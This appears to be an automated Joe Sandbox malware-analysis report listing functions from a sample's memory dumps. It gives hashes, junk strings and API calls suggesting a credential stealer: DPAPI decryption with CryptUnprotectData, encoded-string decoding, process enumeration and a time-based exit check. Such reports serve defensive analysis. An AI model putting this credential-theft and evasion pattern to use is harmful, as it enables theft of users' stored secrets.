Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 78916d83de9ed3ce87afc43a4618643fbb75be720a4a8612c57617f957093300
Instruction ID: a0d8c7836d38be3058bafb78184858b31123ebaf388689be108df06b889f5c08
Opcode Fuzzy Hash: 78916d83de9ed3ce87afc43a4618643fbb75be720a4a8612c57617f957093300
Instruction Fuzzy Hash: B3123D72A101589FCB18FB61DCA6EED7339AF54300F4145E9B50A66191EF307B48EF62

Function 01130B4D Relevance: 9.2, Strings: 6, Instructions: 1729COMMON

Download Yara Rule

Strings

<\z?, xrefs: 0113106B
'+7, xrefs: 01131A3F
z~?3, xrefs: 011312C6
!f]_, xrefs: 01131CEC
_, xrefs: 01131333
:~, xrefs: 0113121F

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: _$!f]_$'+7$<\z?$z~?3$:~
API String ID: 0-2537662500
Opcode ID: fd2a295da57c5bd5c1c18d26288dac9079191447cd1ba0597d5ccf1b1cae14c8
Instruction ID: 65d6e7a0c4f21e07366a1213dbc682b9f634a193e39620d855f7b2dfdf1c1261
Opcode Fuzzy Hash: fd2a295da57c5bd5c1c18d26288dac9079191447cd1ba0597d5ccf1b1cae14c8
Instruction Fuzzy Hash: FDB24BF3A08204AFE3046E2DEC4567AFBE9EFD4760F1A463DE6C4C3744EA3558058696

Function 01129EFA Relevance: 9.1, Strings: 6, Instructions: 1626COMMON

Download Yara Rule

Strings

^}}, xrefs: 0112A573
P`w[, xrefs: 0112A292
s5, xrefs: 0112AD83
ZPQg, xrefs: 0112ABC2
l;\[, xrefs: 0112A166
M-l_, xrefs: 0112A8E6

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ^}}$M-l_$P`w[$ZPQg$l;\[$s5
API String ID: 0-2977884793
Opcode ID: 7e720d26548ac8b77d2dda76b635a69ecb0ffa0bb8e415cb05e20f74b127da9e
Instruction ID: 3e6128b0a3c36a46c9427626a9475e9e73495950b5a4e87b78e40474b30d90d5
Opcode Fuzzy Hash: 7e720d26548ac8b77d2dda76b635a69ecb0ffa0bb8e415cb05e20f74b127da9e
Instruction Fuzzy Hash: 58B2E5F3A0C2049FE3046E2DEC8567AFBE9EF94620F1A493DE6C4C3744EA3558458697

Function 0112345A Relevance: 8.9, Strings: 6, Instructions: 1372COMMON

Download Yara Rule

Strings

bBu, xrefs: 011237A5
*QP1, xrefs: 01123D7C
+Ui, xrefs: 01123F52
~sI, xrefs: 01123EAA
1|Y', xrefs: 0112380C
E}>, xrefs: 01123A6C

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *QP1$+Ui$1|Y'$E}>$bBu$~sI
API String ID: 0-743348690
Opcode ID: 842b50830df29c4b92a7138afe7a92f1559cc565139cc330d0b5fe6d2e8c71ed
Instruction ID: 9b92472daeaf90a34daa99f581c41f2e0ce5cfae9f8a67f17849aba10db47335
Opcode Fuzzy Hash: 842b50830df29c4b92a7138afe7a92f1559cc565139cc330d0b5fe6d2e8c71ed
Instruction Fuzzy Hash: 439219F3A082109FE3046E2DEC8577ABBE9EF94320F1A493DEAC4C7744E63558158697

Function 01124C52 Relevance: 7.9, Strings: 5, Instructions: 1670COMMON

Download Yara Rule

Strings

T?W, xrefs: 011250DF
&\ur, xrefs: 01125117
YH], xrefs: 01124F98
DQ__, xrefs: 01125984
[cc, xrefs: 01124D8B

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: [cc$&\ur$DQ__$T?W$YH]
API String ID: 0-2408647816
Opcode ID: 388f84c3e28e2623a3d522a5c78620667958ed6caec1dcf2173473078a5b3a37
Instruction ID: f05e486194a5189ea8c2d60a6055339326bc29b855babf269b8702c7ed954a8b
Opcode Fuzzy Hash: 388f84c3e28e2623a3d522a5c78620667958ed6caec1dcf2173473078a5b3a37
Instruction Fuzzy Hash: B4B209F360C2009FE304AE2DEC8567AB7E5EF94720F1A453DEAC5C3744EA7598058697

Function 0112BA0D Relevance: 7.9, Strings: 5, Instructions: 1645COMMON

Download Yara Rule

Strings

r-w~, xrefs: 0112BEF7
N=o, xrefs: 0112C3B2
9~, xrefs: 0112C533
c+ny, xrefs: 0112BF6A
?4w<, xrefs: 0112BBBC

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ?4w<$N=o$c+ny$r-w~$9~
API String ID: 0-2359664439
Opcode ID: f8cb669dfe97a549670b7e265803318ef0dfe30c1bd9bdf99d45637c91b2c9dd
Instruction ID: a7cc06ff40385c762cc04e9ecdd4d6c7c0804c23da2778a39e3636444b9102f6
Opcode Fuzzy Hash: f8cb669dfe97a549670b7e265803318ef0dfe30c1bd9bdf99d45637c91b2c9dd
Instruction Fuzzy Hash: 84B239F3A0C2009FE3086E2DEC8567ABBE5EFD4720F1A463DE6C5C7344EA7558058696

Function 0111C676 Relevance: 7.9, Strings: 5, Instructions: 1619COMMON

Download Yara Rule

Strings

]JWO, xrefs: 0111D8BC
wa6, xrefs: 0111D499
Wcgi, xrefs: 0111D0B0
d(_, xrefs: 0111CE37
RgaB, xrefs: 0111CA67

Memory Dump Source

Source File: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: RgaB$Wcgi$]JWO$d(_$wa6
API String ID: 0-1019819669
Opcode ID: 51200883a6ec283e196ae84e2ce64862354adf931f89bdc149e7e10a89c93199
Instruction ID: 7fb393e92f10c409ca8cac2d0472816dfae9e577d92af211b48cb8547c400c17
Opcode Fuzzy Hash: 51200883a6ec283e196ae84e2ce64862354adf931f89bdc149e7e10a89c93199
Instruction Fuzzy Hash: 1AB226F3A0C600AFE3046E29EC8567AFBE9EF94760F16493DEAC4C3744E63558418796

Function 00D3F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON

Download Yara Rule

Strings

}, xrefs: 00D3F99F
\u, xrefs: 00D3FA93
}, xrefs: 00D3FA8F
{, xrefs: 00D3F9AA
{, xrefs: 00D3FA9A
\u, xrefs: 00D3F9A3

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: \u$\u${${$}$}
API String ID: 0-582841131
Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction ID: b743f5731248996e3cb8be604b5ffde4a3c8f0db75e7bb56fb040acc17396de7
Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
Instruction Fuzzy Hash: 2C417E13E19BD9C5CB058B7444A02AEBFB26FE6210F6D42AAC4DD1F382C774814AD3B5

Function 00CDC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CDC971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CDC97C
lstrcat.KERNEL32(?,00CF0B47), ref: 00CDCA43
lstrcat.KERNEL32(?,00CF0B4B), ref: 00CDCA57
lstrcat.KERNEL32(?,00CF0B4E), ref: 00CDCA78

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID:
API String ID: 189259977-0
Opcode ID: 921b166ebac89df4c0a039a796d06d0cd6bbfc0dceddcb4969670a355681babc
Instruction ID: 0e5cad2bcc6eabde0b19adf8a611b073732facef9371c5f21527ed20b02e16e8
Opcode Fuzzy Hash: 921b166ebac89df4c0a039a796d06d0cd6bbfc0dceddcb4969670a355681babc
Instruction Fuzzy Hash: B8416EB990420EDBDB10DFA0DC89FFEB7B8AB48704F1041A9E609A6280D7745A84DF91

Function 00CE6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00CE6C0C
sscanf.NTDLL ref: 00CE6C39
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CE6C52
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CE6C60
ExitProcess.KERNEL32 ref: 00CE6C7A

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 354ee57691c3a65b0d080106f150e4d030894d1560ca8e7aacb99966522cf1f2
Instruction ID: bdd497f4176b5d12ac080f37da89584e469a80691fe1ec67096fe380d50d1977
Opcode Fuzzy Hash: 354ee57691c3a65b0d080106f150e4d030894d1560ca8e7aacb99966522cf1f2
Instruction Fuzzy Hash: 3D21BCB5D1420C9BCB04EFE4E845AEEB7B5BF48300F04852AE516A3250EB34A604DB65

Function 00CD72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 00CD72AD
RtlAllocateHeap.NTDLL(00000000), ref: 00CD72B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00CD72E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00CD7304
LocalFree.KERNEL32(?), ref: 00CD730E

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 88828810d2d2d6fd6b3453ae22444dee8862ecd8087a9bbe2ce06f9c8e2a7a9b
Instruction ID: d789080340ac88e355c85f00cc0d1828407748841e57fd16266fda240b7f5f11
Opcode Fuzzy Hash: 88828810d2d2d6fd6b3453ae22444dee8862ecd8087a9bbe2ce06f9c8e2a7a9b
Instruction Fuzzy Hash: E7011EB5A44308BBDB10DFE4DC46FAE77B8EB44B04F108545FB05BB2C0D6B0AA409B65

Function 00CE9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE97AE
Process32First.KERNEL32(00CF0ACE,00000128), ref: 00CE97C2
Process32Next.KERNEL32(00CF0ACE,00000128), ref: 00CE97D7
StrCmpCA.SHLWAPI(?,00000000), ref: 00CE97EC
CloseHandle.KERNEL32(00CF0ACE), ref: 00CE980A

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
